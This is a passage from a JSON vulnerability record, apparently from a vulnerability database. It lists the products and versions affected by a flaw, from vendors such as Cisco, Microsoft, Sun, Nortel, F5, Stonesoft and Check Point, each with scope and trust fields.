        "version": "7.6(6)"
      },
      {
        "model": "windows server datacenter edition itanium sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "windows server for x64-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "ios 12.0xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "5.2.6"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.6"
      },
      {
        "model": "solaris 8 x86",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.4(1)"
      },
      {
        "model": "opensolaris build snv 96",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4 t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sec",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home basic 64-bit edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.4yd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate ips sensor and analyzer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2.4"
      },
      {
        "model": "ios 12.2fz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows professional sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "networks contact center manager server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "windows vista edition sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "x64"
      },
      {
        "model": "ios 12.2fx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks switched firewall sf/vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "5124"
      },
      {
        "model": "ios 12.4jda",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4xn",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "networks self-service mps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "5000"
      },
      {
        "model": "ios 12.1ez",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 5698tfd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "5000"
      },
      {
        "model": "bigip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4.8"
      },
      {
        "model": "ios 12.2xo",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ea",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2irb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista business sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "bigip global traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.1"
      },
      {
        "model": "ios 12.4mda",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ixe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point software vpn-1 power/utm r65 ipso ga",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "6"
      },
      {
        "model": "ios 12.3yt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 36",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 4526g-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "opensolaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "0"
      },
      {
        "model": "ios 12.2see",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "interactive response",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "stonegate ips sensor and analyzer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.3.7"
      },
      {
        "model": "opensolaris build snv 48",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.2(1)"
      },
      {
        "model": "ios 12.2 sb1b",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server web edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(8)"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(20)"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "9"
      },
      {
        "model": "windows professional sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "rt107e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(12)"
      },
      {
        "model": "windows server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.2ira",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 94",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "5.0.2"
      },
      {
        "model": "windows advanced server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.3yq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4xz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "novell linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "ios 12.4 xg4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "firepass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.5"
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "4.2.6.1"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.2"
      },
      {
        "model": "ios 12.3za",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista business",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2yk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2dx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "networks secure network access identity engine ignition analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "networks switched firewall sf-5114",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.3(4)"
      },
      {
        "model": "ios 12.4 jl1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 sga9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "wanjet",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.0.2"
      },
      {
        "model": "opensolaris build snv 50",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.0sp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "email and web security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.1"
      },
      {
        "model": "ios 12.2zd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "srt100",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.4 xd12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ex",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20080"
      },
      {
        "model": "ios 12.2 srd1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "netscaler access gateway enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.1"
      },
      {
        "model": "netscaler build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.047.8"
      },
      {
        "model": "ios 12.4xp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3yi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center administration ccma",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "7.0"
      },
      {
        "model": "ios 12.4xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt103i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "windows server itanium sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "5.0.3"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(1)"
      },
      {
        "model": "windows xp home sp3",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2yb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks self-service media processing server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "ios 12.0xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista enterprise sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2zp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yn",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2bw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.1(2)"
      },
      {
        "model": "ios 12.2xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "bigip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.3"
      },
      {
        "model": "ios 12.2ye",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 4550t-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "opensolaris build snv 01",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "rt80i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "opensolaris build snv 92",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2xnc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3va",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks secure network access switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-40500"
      },
      {
        "model": "ios 12.2xnd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 xl4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 83",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "opensolaris build snv 106",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4 ja",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "windows vista ultimate 64-bit edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 4526t-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "linux enterprise desktop sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "ios 12.2xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 125",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2sbc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip local traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.6.1"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(4)"
      },
      {
        "model": "ios 12.2yv",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "networks self service cdd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "ios 12.1ga",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 2550t-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "2500"
      },
      {
        "model": "rt100i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.2xw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.4(3)"
      },
      {
        "model": "bigip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4.8"
      },
      {
        "model": "ios 12.4xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks self-service ccxml",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "coat systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "5.2.2.5"
      },
      {
        "model": "ios 12.0xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sed",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks secure network access identity engine ignition posture",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2.1"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6"
      },
      {
        "model": "ios 12.2sm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4md",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks callpilot 1005r",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "windows server enterprise edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "networks self-service peri application",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.1"
      },
      {
        "model": "opensolaris build snv 76",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows xp professional edition sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "x64"
      },
      {
        "model": "ios 12.2xna",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point software vpn-1 power/utm r60 hfa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "07"
      },
      {
        "model": "ios 12.1eb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "netscaler build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.196.4"
      },
      {
        "model": "point vpn-1 power vsx ngx r65",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "0"
      },
      {
        "model": "opensolaris build snv 101a",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.3bw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 111a",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.1yd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2.11"
      },
      {
        "model": "ios 12.3yf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 87",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.4"
      },
      {
        "model": "windows vista home premium sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.3yz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3yg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 t6a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ewa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2zg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows xp professional sp3",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2za",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point software connectra r62 cm hfa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "01"
      },
      {
        "model": "wanjet",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2.8"
      },
      {
        "model": "ios 12.3xz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home premium 64-bit edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "ios 12.3xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 mda",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate ssl vpn engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "1.4"
      },
      {
        "model": "networks self-service peri ctx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.2(1)"
      },
      {
        "model": "firepass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.5.2"
      },
      {
        "model": "ios 12.2ja",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "9"
      },
      {
        "model": "opensolaris build snv 113",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2zc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4ja",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point software connectra r66.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "check",
        "version": null
      },
      {
        "model": "networks contact center manager server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "6.0"
      },
      {
        "model": "networks ethernet routing switch 5650td-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "5000"
      },
      {
        "model": "ios 12.4 yb",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 57",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows xp tablet pc edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "linux enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "windows server enterprise edition itanium sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.0"
      },
      {
        "model": "ios 12.4xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4gc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "firepass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.0"
      },
      {
        "model": "ios 12.1yi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "4.2.8.7"
      },
      {
        "model": "networks ethernet routing switch 4526gtx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "rta50i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "opensolaris build snv 119",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "bigip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4.5"
      },
      {
        "model": "ios 12.4xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1az",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.0"
      },
      {
        "model": "ios 12.2da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1 ea13",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home basic 64-bit edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(5.3)"
      },
      {
        "model": "ios 12.2xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point software vpn-1 power/utm r70.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "check",
        "version": null
      },
      {
        "model": "point vpn-1 power vsx vsx-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "0"
      },
      {
        "model": "stonegate ips sensor and analyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2.2"
      },
      {
        "model": "coat systems proxysg 200-c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "0"
      },
      {
        "model": "bigip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.3"
      },
      {
        "model": "bigip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.1"
      },
      {
        "model": "ios 12.2yu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
